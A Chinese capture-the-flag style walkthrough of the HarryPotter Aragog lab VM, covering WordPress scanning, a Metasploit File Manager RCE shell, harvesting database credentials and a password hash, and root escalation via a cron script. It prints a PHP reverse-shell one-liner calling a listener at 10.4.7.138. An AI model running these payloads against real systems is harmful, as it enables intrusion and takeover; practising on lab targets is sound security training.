harrypotter1-aragog靶机攻略

harrypotter1

扫描

nmap

指纹

目录

渗透

找到了登录位置

看到wordpress就用wpscan扫一扫

wpscan --url="http://10.4.7.153/blog" -e p --plugins-detection aggressive --api-token=d1fuMZc2tbhJWYk9VfNsl0GZlyYxkfH6bpL0pCKFhok

扫描出有这些file manager漏洞

使用msf搜一下这个漏洞

此处选择使用exploit/multi/http/wp_file_manager_rce

名字完全契合

配置完成后运行获取shell,注意要配置targeturi参数

使用该命令获取回显

/usr/bin/script -qc /bin/bash /dev/null

在hagrid98的家目录下发现疑似密码文件

horcrux_{MTogUmlkRGxFJ3MgRGlBcnkgZEVzdHJvWWVkIEJ5IGhhUnJ5IGluIGNoYU1iRXIgb2YgU2VDcmV0cw==}

解码结果如图

wordpress文件夹在etc下,进去看看发现config配置文件

得到数据库的用户信息

root:mySecr3tPass

登入数据库

mysql -uroot -p

在wordpress数据库的wp-users表中发现用户信息

hagrid98:$P$BYdTic1NGSb8hJbpVEMiJaAiNJDHtc.

hash-identifier识别一下密码类型

拿去md5解密,得到

hagrid98:password123

提权

ssh连接登录成功

在/opt文件夹下发现脚本文件,查看内容,是将下载内容复制到tmp路径下,该脚本可能为一个定时执行的任务

将该脚本文件更改为如图内容

进入/tmp增加一个php文件,将下面反弹命令写入

<?php $sock=fsockopen("10.4.7.138",6789);exec("/bin/sh -i <&3 >&3 2>&3");?>

开启监听端口

等待一会提权成功

获取第二个

相关推荐
nnloveswc1 小时前
PTE-中间件安全
安全
冰水°1 小时前
3.1_文件上传漏洞
安全·网络安全·文件上传·条件竞争·.htaccess·文件上传绕过
ZJ_.2 小时前
Electron 沙盒模式与预加载脚本:保障桌面应用安全的关键机制
开发语言·前端·javascript·vue.js·安全·electron·node.js
Wh1teR0se2 小时前
[ACTF2020 新生赛]Upload 1--详细解析
web安全·网络安全
星海幻影3 小时前
网络基础-超文本协议与内外网划分(超长版)
服务器·网络·安全
烬奇小云3 小时前
认识一下Unicorn
android·python·安全·系统安全
Sweet_vinegar5 小时前
Wireshark
网络·测试工具·安全·wireshark·ctf·buuctf
23zhgjx-NanKon7 小时前
华为eNSP:RSTP
网络·安全·网络安全·华为
javachen__11 小时前
从美国大选,看软件安全风险与挑战
网络·安全·web安全